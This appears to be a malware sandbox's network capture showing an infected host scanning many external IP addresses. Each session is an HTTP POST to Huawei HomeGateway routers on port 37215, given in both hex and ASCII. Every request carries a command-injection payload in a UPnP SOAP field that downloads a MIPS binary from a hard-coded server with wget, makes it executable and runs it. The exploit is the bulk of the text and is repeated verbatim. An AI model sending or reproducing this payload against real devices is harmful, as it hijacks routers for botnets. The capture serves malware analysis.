                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    61192.168.2.233876241.8.68.18037215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.802937031 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    62192.168.2.2357020156.61.209.11437215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.802994013 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    63192.168.2.234137441.186.242.23137215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.803092957 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    64192.168.2.2339612197.17.133.4937215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.803184986 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    65192.168.2.235442841.153.210.037215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.803258896 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    66192.168.2.2345280156.76.37.5637215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.803396940 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    67192.168.2.234308041.235.143.15637215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.803456068 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    68192.168.2.2345800156.146.0.17337215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.803523064 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    69192.168.2.234594441.89.254.9637215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.803622007 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    70192.168.2.2343268156.134.142.21637215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.803708076 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
